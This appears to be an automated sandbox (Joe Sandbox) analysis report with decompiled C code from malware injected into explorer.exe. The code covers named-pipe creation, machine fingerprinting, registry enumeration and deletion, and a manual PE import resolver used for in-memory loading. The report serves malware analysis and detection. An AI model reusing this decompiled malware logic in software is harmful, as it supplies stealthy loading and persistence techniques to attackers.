10598->10608 10612 c8604 RtlAllocateHeap 10598->10612 10600 cec2c 10600->10608 10613 c8604 RtlAllocateHeap 10600->10613 10601 c861a 2 API calls 10602 ceda5 10601->10602 10603 c861a 2 API calls 10602->10603 10605 cedb3 10603->10605 10606 c88cf 10605->10606 10607 c861a 2 API calls 10605->10607 10606->10587 10606->10593 10607->10606 10608->10601 10609 cec42 10609->10608 10614 c8698 10609->10614 10611->10598 10612->10600 10613->10609 10619 c8604 RtlAllocateHeap 10614->10619 10616 c86ad 10617 c861a 2 API calls 10616->10617 10618 c86d5 10616->10618 10617->10618 10618->10609 10619->10616 10623 c8ab3 10620->10623 10621 c8604 RtlAllocateHeap 10621->10623 10622 c8be7 10625 c8604 RtlAllocateHeap 10622->10625 10623->10621 10623->10622 10624 c861a 2 API calls 10623->10624 10624->10623 10625->10581 10627 c974b 10626->10627 10628 c978c SetLastError 10627->10628 10629 c9780 SetLastError 10627->10629 10630 c9799 10628->10630 10629->10630 10630->10581 10632 c91b1 10631->10632 10634 c91c7 10631->10634 10647 c8604 RtlAllocateHeap 10632->10647 10634->10581 10637 c8ccf 10635->10637 10646 c8d57 10635->10646 10636 c8d09 10640 c8d19 10636->10640 10648 c8de5 10636->10648 10637->10636 10638 c861a 2 API calls 10637->10638 10637->10646 10638->10637 10641 c861a 2 API calls 10640->10641 10643 c8d34 10640->10643 10641->10643 10642 c8d4a 10644 c861a 2 API calls 10642->10644 10643->10642 10645 c861a 2 API calls 10643->10645 10644->10646 10645->10642 10646->10577 10647->10634 10659 c8604 RtlAllocateHeap 10648->10659 10650 c8e28 10650->10640 10651 c8e1e 10651->10650 10653 c8e61 10651->10653 10660 c879d 10651->10660 10654 ca5f7 CreateFileW 10653->10654 10655 c8f39 10654->10655 10656 ca65c WriteFile 10655->10656 10657 c8f40 10655->10657 10656->10657 10658 c861a 2 API calls 10657->10658 10658->10650 10659->10651 10661 d242d _ftol2_sse 10660->10661 10662 c87b6 10661->10662 10663 c87e3 10662->10663 10664 d242d _ftol2_sse 10662->10664 10663->10653 10664->10662 10666 c95e1 RtlAllocateHeap 10665->10666 10667 

        Executed Functions

        C-Code - Quality: 79%
        			E000C31C2(void* __edx, void* __eflags) {
        				CHAR* _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				void* _v20;
        				signed int _t10;
        				intOrPtr _t11;
        				intOrPtr _t12;
        				void* _t16;
        				intOrPtr _t18;
        				intOrPtr _t22;
        				intOrPtr _t28;
        				void* _t38;
        				CHAR* _t40;
        
        				_t38 = __edx;
        				_t28 =  *0xde688; // 0xf0000
        				_t10 = E000CC292( *((intOrPtr*)(_t28 + 0xac)), __eflags);
        				_t40 = _t10;
        				_v8 = _t40;
        				if(_t40 != 0) {
        					_t11 = E000C8604(0x80000); // executed
        					 *0xde724 = _t11;
        					__eflags = _t11;
        					if(_t11 != 0) {
        						_t12 = E000CBD10(); // executed
        						_v16 = _t12;
        						__eflags = _t12;
        						if(_t12 != 0) {
        							_push(0xc);
        							_pop(0);
        							_v12 = 1;
        						}
        						_v20 = 0;
        						__eflags = 0;
        						asm("sbb eax, eax");
        						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
        						 *0xde674 = _t16;
        						__eflags = _t16 - 0xffffffff;
        						if(_t16 != 0xffffffff) {
        							E000CBC7A( &_v20, _t38); // executed
        							_t18 = E000C98EE(E000C32A1, 0, __eflags, 0, 0); // executed
        							__eflags = _t18;
        							if(_t18 != 0) {
        								goto L12;
        							}
        							_t22 =  *0xde684; // 0x64f8f0
        							 *((intOrPtr*)(_t22 + 0x30))( *0xde674);
        							_push(0xfffffffd);
        							goto L11;
        						} else {
        							 *0xde674 = 0;
        							_push(0xfffffffe);
        							L11:
        							_pop(0);
        							L12:
        							E000C861A( &_v8, 0xffffffff);
        							return 0;
        						}
        					}
        					_push(0xfffffff5);
        					goto L11;
        				}
        				return _t10 | 0xffffffff;
        			}

















        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: db7eda31075c865da5e648216ee2e6099e473afadaf18acdaabd6f3b714c174f
        • Instruction ID: d13159e9ccd9f4dddc0a4346f52e0233d29fb46ca893f90048703841fd8101b3
        • Opcode Fuzzy Hash: db7eda31075c865da5e648216ee2e6099e473afadaf18acdaabd6f3b714c174f
        • Instruction Fuzzy Hash: 6D21F8726051119AEB10BBB8EC45FAE37A8EB55374F20432EF525D71D1DE3085008761
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E000C5A61(void* __eflags) {
        				intOrPtr _t2;
        				void* _t6;
        				void* _t7;
        
        				_t2 =  *0xde684; // 0x64f8f0
        				 *((intOrPtr*)(_t2 + 0x108))(1, E000C5A06);
        				E000C5631(_t6, _t7); // executed
        				return 0;
        			}







        APIs
        • RtlAddVectoredExceptionHandler.NTDLL(00000001,000C5A06,000C5CE8), ref: 000C5A6D
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: ExceptionHandlerVectored
        • String ID:
        • API String ID: 3310709589-0
        • Opcode ID: d6f4ad1c99d02ec48078a8cc1cbcb086cbc8fad2bc79094a378f4e47e8bbdcd8
        • Instruction ID: c73ec1648ac1b9eac1dd2e70802dc4e625edaa9747ea1c085a3dbdbdc41907be
        • Opcode Fuzzy Hash: d6f4ad1c99d02ec48078a8cc1cbcb086cbc8fad2bc79094a378f4e47e8bbdcd8
        • Instruction Fuzzy Hash: DBB092742515405BD640AB60CC8AF8C32909B64742F0100A4B2468A0F3CAE0A4C06612
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 79%
        			E000C4A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
        				char _v516;
        				void _v1044;
        				char _v1076;
        				signed int _v1080;
        				signed int _v1096;
        				WCHAR* _v1100;
        				intOrPtr _v1104;
        				signed int _v1108;
        				intOrPtr _v1112;
        				intOrPtr _v1116;
        				char _v1144;
        				char _v1148;
        				void* __esi;
        				intOrPtr _t66;
        				intOrPtr _t73;
        				signed int _t75;
        				intOrPtr _t76;
        				signed int _t80;
        				signed int _t81;
        				WCHAR* _t87;
        				void* _t89;
        				signed int _t90;
        				signed int _t91;
        				signed int _t93;
        				signed int _t94;
        				WCHAR* _t96;
        				intOrPtr _t106;
        				intOrPtr _t107;
        				void* _t108;
        				intOrPtr _t109;
        				signed char _t116;
        				WCHAR* _t118;
        				void* _t122;
        				signed int _t123;
        				intOrPtr _t125;
        				void* _t128;
        				void* _t129;
        				WCHAR* _t130;
        				void* _t134;
        				void* _t141;
        				void* _t143;
        				WCHAR* _t145;
        				signed int _t153;
        				void* _t154;
        				void* _t178;
        				signed int _t180;
        				void* _t181;
        				void* _t183;
        				void* _t187;
        				signed int _t188;
        				WCHAR* _t190;
        				signed int _t191;
        				signed int _t192;
        				intOrPtr* _t194;
        				signed int _t196;
        				void* _t199;
        				void* _t200;
        				void* _t201;
        				void* _t202;
        				intOrPtr* _t203;
        				void* _t208;
        
        				_t208 = __fp0;
        				_push(_t191);
        				_t128 = __edx;
        				_t187 = __ecx;
        				_t192 = _t191 | 0xffffffff;
        				memset( &_v1044, 0, 0x20c);
        				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
        				_v1108 = 1;
        				if(_t187 != 0) {
        					_t123 =  *0xde688; // 0xf0000
        					_t125 =  *0xde68c; // 0x64fab8
        					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
        				}
        				if(E000CBB8D(_t187) != 0) {
        					L4:
        					_t134 = _t128; // executed
        					_t66 = E000CB7A8(_t134,  &_v516); // executed
        					_push(_t134);
        					_v1104 = _t66;
        					E000CB67D(_t66,  &_v1076, _t206, _t208);
        					_t129 = E000C49C7( &_v1076,  &_v1076, _t206);
        					_t141 = E000CD400( &_v1076, E000CC379( &_v1076), 0);
        					E000CB88A(_t141,  &_v1100, _t208);
        					_t175 =  &_v1076;
        					_t73 = E000C2C8F(_t187,  &_v1076, _t206, _t208); // executed
        					_v1112 = _t73;
        					_t143 = _t141;
        					if(_t73 != 0) {
        						_push(0);
        						_push(_t129);
        						_push("\\");
        						_t130 = E000C92E5(_t73);
        						_t200 = _t199 + 0x10;
        						_t75 =  *0xde688; // 0xf0000
        						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
        						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
        							L12:
        							__eflags = _v1108;
        							if(__eflags != 0) {
        								_t76 = E000C91E3(_v1112);
        								_t145 = _t130;
        								 *0xde740 = _t76;
        								 *0xde738 = E000C91E3(_t145);
        								L17:
        								_push(_t145);
        								_t80 = E000C9B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
        								_t188 = _t80;
        								_t201 = _t200 + 0x10;
        								__eflags = _t188;
        								if(_t188 == 0) {
        									goto L41;
        								}
        								_push(0xdb9ca);
        								E000C9F48(0xe); // executed
        								E000C9F6C(_t188, _t208, _t130); // executed
        								_t194 = _a4;
        								_v1096 = _v1096 & 0x00000000;
        								_push(2);
        								_v1100 =  *_t194;
        								_push(8);
        								_push( &_v1100);
        								_t178 = 0xb; // executed
        								E000CA0AB(_t188, _t178, _t208); // executed
        								_t179 =  *(_t194 + 0x10);
        								_t202 = _t201 + 0xc;
        								__eflags =  *(_t194 + 0x10);
        								if( *(_t194 + 0x10) != 0) {
        									E000CA3ED(_t188, _t179, _t208);
        								}
        								_t180 =  *(_t194 + 0xc);
        								__eflags = _t180;
        								if(_t180 != 0) {
        									E000CA3ED(_t188, _t180, _t208); // executed
        								}
        								_t87 = E000C980C(0);
        								_push(2);
        								_v1100 = _t87;
        								_t153 = _t188;
        								_push(8);
        								_v1096 = _t180;
        								_push( &_v1100);
        								_t181 = 2; // executed
        								_t89 = E000CA0AB(_t153, _t181, _t208); // executed
        								_t203 = _t202 + 0xc;
        								__eflags = _v1108;
        								if(_v1108 == 0) {
        									_t153 =  *0xde688; // 0xf0000
        									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
        									if(__eflags != 0) {
        										_t90 = E000CFC1F(_t89, _t181, _t208, 0, _t130, 0);
        										_t203 = _t203 + 0xc;
        										goto L26;
        									}
        									_t153 = _t153 + 0x228;
        									goto L25;
        								} else {
        									_t91 =  *0xde688; // 0xf0000
        									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
        									if(__eflags != 0) {
        										L32:
        										__eflags =  *(_t91 + 0x1898) & 0x00000082;
        										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
        											_t183 = 0x64;
        											E000CE23E(_t183);
        										}
        										E000C52C0( &_v1076, _t208);
        										_t190 = _a8;
        										_t154 = _t153;
        										__eflags = _t190;
        										if(_t190 != 0) {
        											_t94 =  *0xde688; // 0xf0000
        											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
        											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
        												lstrcpyW(_t190, _t130);
        											} else {
        												_t96 = E000C109A(_t154, 0x228);
        												_v1100 = _t96;
        												lstrcpyW(_t190, _t96);
        												E000C85D5( &_v1100);
        												 *_t203 = "\"";
        												lstrcatW(_t190, ??);
        												lstrcatW(_t190, _t130);
        												lstrcatW(_t190, "\"");
        											}
        										}
        										_t93 = _a12;
        										__eflags = _t93;
        										if(_t93 != 0) {
        											 *_t93 = _v1104;
        										}
        										_t192 = 0;
        										__eflags = 0;
        										goto L41;
        									}
        									_t51 = _t91 + 0x228; // 0xf0228
        									_t153 = _t51;
        									L25:
        									_t90 = E000C553F(_t153, _t130, __eflags);
        									L26:
        									__eflags = _t90;
        									if(_t90 >= 0) {
        										_t91 =  *0xde688; // 0xf0000
        										goto L32;
        									}
        									_push(0xfffffffd);
        									L6:
        									_pop(_t192);
        									goto L41;
        								}
        							}
        							_t106 = E000CC292(_v1104, __eflags);
        							_v1112 = _t106;
        							_t107 =  *0xde684; // 0x64f8f0
        							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
        							__eflags = _t108 - _t192;
        							if(_t108 != _t192) {
        								_t109 =  *0xde684; // 0x64f8f0
        								 *((intOrPtr*)(_t109 + 0x30))();
        								E000C861A( &_v1148, _t192);
        								_t145 = _t108;
        								goto L17;
        							}
        							E000C861A( &_v1144, _t192);
        							_t81 = 1;
        							goto L42;
        						}
        						_t116 =  *(_t75 + 0x1898);
        						__eflags = _t116 & 0x00000004;
        						if((_t116 & 0x00000004) == 0) {
        							__eflags = _t116;
        							if(_t116 != 0) {
        								goto L12;
        							}
        							L11:
        							E000CE286(_v1112, _t175);
        							goto L12;
        						}
        						_v1080 = _v1080 & 0x00000000;
        						_t118 = E000C95E1(_t143, 0x879);
        						_v1100 = _t118;
        						_t175 = _t118;
        						E000CBFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
        						E000C85D5( &_v1100);
        						_t200 = _t200 + 0x14;
        						goto L11;
        					}
        					_push(0xfffffffe);
        					goto L6;
        				} else {
        					_t122 = E000C2BA4( &_v1044, _t192, 0x105); // executed
        					_t206 = _t122;
        					if(_t122 == 0) {
        						L41:
        						_t81 = _t192;
        						L42:
        						return _t81;
        					}
        					goto L4;
        				}
        			}

































































        APIs
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: lstrcat$lstrcpy$memset
        • String ID:
        • API String ID: 1985475764-0
        • Opcode ID: bbb91f8f85fc09bd0cb59870f16fccdce3466dba909f4f420023db500a225448
        • Instruction ID: e00079e0afd43232e147177fe6b1363a575de2813d944f784ff1f94eb2fb20e0
        • Opcode Fuzzy Hash: bbb91f8f85fc09bd0cb59870f16fccdce3466dba909f4f420023db500a225448
        • Instruction Fuzzy Hash: BE91AC71604300AFE754EB20D896FBE73E9BB84720F14492EF9558B2D2EB74DD048B52
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 94%
        			E000CB7A8(WCHAR* __ecx, void* __edx) {
        				long _v8;
        				long _v12;
        				WCHAR* _v16;
        				short _v528;
        				short _v1040;
        				short _v1552;
        				WCHAR* _t27;
        				signed int _t29;
        				void* _t33;
        				long _t38;
        				WCHAR* _t43;
        				WCHAR* _t56;
        
        				_t44 = __ecx;
        				_v8 = _v8 & 0x00000000;
        				_t43 = __edx;
        				_t56 = __ecx;
        				memset(__edx, 0, 0x100);
        				_v12 = 0x100;
        				GetComputerNameW( &_v528,  &_v12);
        				lstrcpynW(_t43,  &_v528, 0x100);
        				_t27 = E000C95E1(_t44, 0xa88);
        				_v16 = _t27;
        				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
        				asm("sbb eax, eax");
        				_v8 = _v8 &  ~_t29;
        				E000C85D5( &_v16);
        				_t33 = E000CC392(_t43);
        				E000C9640( &(_t43[E000CC392(_t43)]), 0x100 - _t33, L"%u", _v8);
        				lstrcatW(_t43, _t56);
        				_t38 = E000CC392(_t43);
        				_v12 = _t38;
        				CharUpperBuffW(_t43, _t38);
        				return E000CD400(_t43, E000CC392(_t43) + _t40, 0);
        			}

        APIs
        • memset.MSVCRT ref: 000CB7C5
        • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 000CB7E0
        • lstrcpynW.KERNEL32(?,?,00000100), ref: 000CB7EF
        • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 000CB821
          • Part of subcall function 000C9640: _vsnwprintf.MSVCRT ref: 000C965D
        • lstrcatW.KERNEL32 ref: 000CB85A
        • CharUpperBuffW.USER32(?,00000000), ref: 000CB86C
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
        • String ID:
        • API String ID: 3410906232-0
        • Opcode ID: dfc5864c2b90876376009b67c939ce655e3198ce6944b79d75ab05716b14c094
        • Instruction ID: 2790561c89e92655b6e37f14f7a47cad77b00b55e4e119700a331dcc1739aec8
        • Opcode Fuzzy Hash: dfc5864c2b90876376009b67c939ce655e3198ce6944b79d75ab05716b14c094
        • Instruction Fuzzy Hash: 302156B2901218BFE714ABA4DC8AFEE77BCDF54310F10856AF505D6182EE75AF048B64
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 123 c61b4-c61f9 memset call c8604 126 c61ff-c6211 call c8604 123->126 127 c6363-c6369 123->127 126->127 130 c6217-c6234 RegOpenKeyExW 126->130 131 c623a-c626d 130->131 132 c6333-c6337 130->132 137 c627f-c6284 131->137 138 c626f-c627a 131->138 133 c6339-c6341 RegCloseKey 132->133 134 c6344-c6360 call c861a * 2 132->134 133->134 134->127 137->132 140 c628a 137->140 138->132 144 c628d-c62dc memset * 2 140->144 146 c62de-c62ee 144->146 147 c6326-c632d 144->147 149 c62f0-c6304 146->149 150 c6323 146->150 147->132 147->144 149->150 152 c6306-c6313 call cc392 149->152 150->147 155 c631c-c631e call cb1b1 152->155 156 c6315-c6317 152->156 155->150 156->155
        C-Code - Quality: 80%
        			E000C61B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
        				void* _v8;
        				int _v12;
        				int _v16;
        				int _v20;
        				char _v24;
        				char _v28;
        				void* _v32;
        				void* _v36;
        				char _v40;
        				char _v44;
        				char _v48;
        				char _v56;
        				void _v576;
        				void* _t53;
        				intOrPtr _t72;
        				intOrPtr _t80;
        				intOrPtr _t81;
        				intOrPtr _t82;
        				signed int _t85;
        				intOrPtr _t87;
        				int _t89;
        				intOrPtr _t90;
        				intOrPtr _t92;
        				void* _t96;
        				void* _t97;
        				void* _t98;
        				void* _t99;
        				void* _t100;
        				void* _t108;
        
        				_t108 = __fp0;
        				_t96 = __edx;
        				_t89 = 0;
        				_v8 = 0;
        				memset( &_v576, 0, 0x208);
        				_v28 = 0x104;
        				_v20 = 0x3fff;
        				_v16 = 0;
        				_t53 = E000C8604(0x3fff); // executed
        				_t98 = _t53;
        				_t100 = _t99 + 0x10;
        				_v32 = _t98;
        				if(_t98 == 0) {
        					L18:
        					return 0;
        				}
        				_t97 = E000C8604(0x800);
        				_v36 = _t97;
        				if(_t97 == 0) {
        					goto L18;
        				}
        				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
        					L15:
        					if(_v8 != 0) {
        						RegCloseKey(_v8);
        					}
        					E000C861A( &_v32, 0x3fff);
        					E000C861A( &_v36, 0x800);
        					goto L18;
        				}
        				_push( &_v56);
        				_push( &_v40);
        				_push( &_v44);
        				_push( &_v48);
        				_push( &_v24);
        				_push(0);
        				_push(0);
        				_push(0);
        				_push(0);
        				_push( &_v28);
        				_push( &_v576);
        				_t72 =  *0xde68c; // 0x64fab8
        				_push(_v8);
        				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
        					__eflags = _v24;
        					if(_v24 == 0) {
        						goto L15;
        					}
        					_v12 = 0;
        					do {
        						memset(_t97, 0, 0x800);
        						memset(_t98, 0, 0x3fff);
        						_t100 = _t100 + 0x18;
        						_v20 = 0x3fff;
        						_v16 = 0x800;
        						 *_t98 = 0;
        						_t80 =  *0xde68c; // 0x64fab8
        						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
        						__eflags = _t81;
        						if(_t81 == 0) {
        							_t82 =  *0xde690; // 0x64fb90
        							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
        							__eflags = _t90;
        							if(_t90 != 0) {
        								_t92 =  *0xde68c; // 0x64fab8
        								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
        								__eflags = _a16;
        								if(_a16 != 0) {
        									_t85 = E000CC392(_t90);
        									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
        									if(__eflags == 0) {
        										__eflags = 0;
        										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
        									}
        									E000CB1B1(_t90, _t96, __eflags, _t108);
        								}
        							}
        							_t89 = _v12;
        						}
        						_t89 = _t89 + 1;
        						_v12 = _t89;
        						__eflags = _t89 - _v24;
        					} while (_t89 < _v24);
        					goto L15;
        				}
        				_t87 =  *0xde68c; // 0x64fab8
        				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
        				goto L15;
        			}

        APIs
        • memset.MSVCRT ref: 000C61D2
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 000C622C
        • memset.MSVCRT ref: 000C6295
        • memset.MSVCRT ref: 000C62A2
        • RegCloseKey.KERNEL32(00000000,?,?,00000001), ref: 000C6341
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: memset$AllocateCloseHeapOpen
        • String ID:
        • API String ID: 1886988140-0
        • Opcode ID: f6fa1eac9dcb17a81bba8c4404ec287a86c2780e00c12e61b3c54107ad2da9c9
        • Instruction ID: f078e681015c4581afc2321a8b200155c778797c9d6990bad354d136111ed3bb
        • Opcode Fuzzy Hash: f6fa1eac9dcb17a81bba8c4404ec287a86c2780e00c12e61b3c54107ad2da9c9
        • Instruction Fuzzy Hash: 33510EB1A00249AFEB61DF94CC85FEE7BBCEF04740F10806AF605AB152DB759A058B65
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 94%
        			E000CCF84(void* __ecx) {
        				intOrPtr _t11;
        				long _t12;
        				intOrPtr _t17;
        				intOrPtr _t18;
        				struct _OSVERSIONINFOA* _t29;
        
        				_push(__ecx);
        				_t29 =  *0xde688; // 0xf0000
        				GetCurrentProcess();
        				_t11 = E000CBA05(); // executed
        				_t1 = _t29 + 0x1644; // 0xf1644
        				_t25 = _t1;
        				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
        				_t12 = GetModuleFileNameW(0, _t1, 0x105);
        				_t33 = _t12;
        				if(_t12 != 0) {
        					_t12 = E000C8FBE(_t25, _t33);
        				}
        				_t3 = _t29 + 0x228; // 0xf0228
        				 *(_t29 + 0x1854) = _t12;
        				 *((intOrPtr*)(_t29 + 0x434)) = E000C8FBE(_t3, _t33);
        				memset(_t29, 0, 0x9c);
        				_t29->dwOSVersionInfoSize = 0x9c;
        				GetVersionExA(_t29);
        				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
        				_t17 = E000CE3B6(_t3);
        				_t7 = _t29 + 0x220; // 0xf0220
        				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
        				_t18 = E000CE3F1(_t7); // executed
        				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
        				return _t18;
        			}

        APIs
        • GetCurrentProcess.KERNEL32(?,?,000F0000,?,000C3545), ref: 000CCF90
        • GetModuleFileNameW.KERNEL32(00000000,000F1644,00000105,?,?,000F0000,?,000C3545), ref: 000CCFB1
        • memset.MSVCRT ref: 000CCFE2
        • GetVersionExA.KERNEL32(000F0000,000F0000,?,000C3545), ref: 000CCFED
        • GetCurrentProcessId.KERNEL32(?,000C3545), ref: 000CCFF3
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CurrentProcess$FileModuleNameVersionmemset
        • String ID:
        • API String ID: 3581039275-0
        • Opcode ID: ce077deba676a9e204692a8621cf94e2ae9e6113a021fd017ecb45372178f67c
        • Instruction ID: 85beb0dd8ed8ae9ed765903e2ec244192ab05f814248cde92d819e8ab3455d73
        • Opcode Fuzzy Hash: ce077deba676a9e204692a8621cf94e2ae9e6113a021fd017ecb45372178f67c
        • Instruction Fuzzy Hash: B6019E709027009BE720AF71D84AFEABBE5EF80300F00082EF85683282EF746505CB64
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 170 d249b-d24a9 171 d24ab-d24ae 170->171 172 d24b3-d24f3 GetModuleHandleA call ce099 170->172 173 d2660-d2661 171->173 176 d265e 172->176 177 d24f9-d2510 172->177 176->173 178 d2513-d251a 177->178 179 d251c-d2525 178->179 180 d2527-d2537 178->180 179->178 181 d253a-d2541 180->181 181->176 182 d2547-d255e LoadLibraryA 181->182 183 d2568-d256e 182->183 184 d2560-d2563 182->184 185 d257d-d2586 183->185 186 d2570-d257b 183->186 184->173 187 d2589 185->187 186->187 188 d258d-d2593 187->188 189 d2599-d25b1 188->189 190 d2650-d2659 188->190 191 d25d4-d2602 189->191 192 d25b3-d25d2 189->192 190->181 195 d2605-d260b 191->195 192->195 196 d260d-d261b 195->196 197 d2639-d264b 195->197 198 d261d-d262f 196->198 199 d2631-d2637 196->199 197->188 198->197 199->197
        C-Code - Quality: 50%
        			E000D249B(signed int __eax, intOrPtr _a4) {
        				intOrPtr* _v8;
        				signed int* _v12;
        				signed int _v16;
        				signed int _v20;
        				signed int _v24;
        				signed int _v28;
        				intOrPtr _v32;
        				struct HINSTANCE__* _v36;
        				intOrPtr _v40;
        				signed int _v44;
        				struct HINSTANCE__* _v48;
        				intOrPtr _v52;
        				signed int _v56;
        				intOrPtr _v60;
        				signed int _v64;
        				signed int _t109;
        				signed int _t112;
        				signed int _t115;
        				struct HINSTANCE__* _t121;
        				void* _t163;
        
        				_v44 = _v44 & 0x00000000;
        				if(_a4 != 0) {
        					_v48 = GetModuleHandleA("kernel32.dll");
        					_v40 = E000CE099(_v48, "GetProcAddress");
        					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
        					_v32 = _v52;
        					_t109 = 8;
        					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
        						L24:
        						return 0;
        					}
        					_v56 = 0x80000000;
        					_t112 = 8;
        					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
        					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
        						_v8 = _v8 + 0x14;
        					}
        					_t115 = 8;
        					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
        					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
        						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
        						_v36 = _t121;
        						if(_v36 != 0) {
        							if( *_v8 == 0) {
        								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
        							} else {
        								_v12 =  *_v8 + _a4;
        							}
        							_v28 = _v28 & 0x00000000;
        							while( *_v12 != 0) {
        								_v24 = _v24 & 0x00000000;
        								_v16 = _v16 & 0x00000000;
        								_v64 = _v64 & 0x00000000;
        								_v20 = _v20 & 0x00000000;
        								if(( *_v12 & _v56) == 0) {
        									_v60 =  *_v12 + _a4;
        									_v20 = _v60 + 2;
        									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
        									_v16 = _v40(_v36, _v20);
        								} else {
        									_v24 =  *_v12;
        									_v20 = _v24 & 0x0000ffff;
        									_v16 = _v40(_v36, _v20);
        								}
        								if(_v24 != _v16) {
        									_v44 = _v44 + 1;
        									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
        										 *_v12 = _v16;
        									} else {
        										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
        									}
        								}
        								_v12 =  &(_v12[1]);
        								_v28 = _v28 + 4;
        							}
        							_v8 = _v8 + 0x14;
        							continue;
        						}
        						_t163 = 0xfffffffd;
        						return _t163;
        					}
        					goto L24;
        				}
        				return __eax | 0xffffffff;
        			}

        APIs
        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000D24B8
        • LoadLibraryA.KERNEL32(00000000), ref: 000D2551
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: HandleLibraryLoadModule
        • String ID: GetProcAddress$kernel32.dll
        • API String ID: 4133054770-1584408056
        • Opcode ID: 5b73e45b0ccaba85451fd15043d652342e788a2a1f747586dafaf4a79dd21d9c
        • Instruction ID: deaac39a8f92dcb34ee975fe36824c3fd640916c06a8e948343ef26f76a1822f
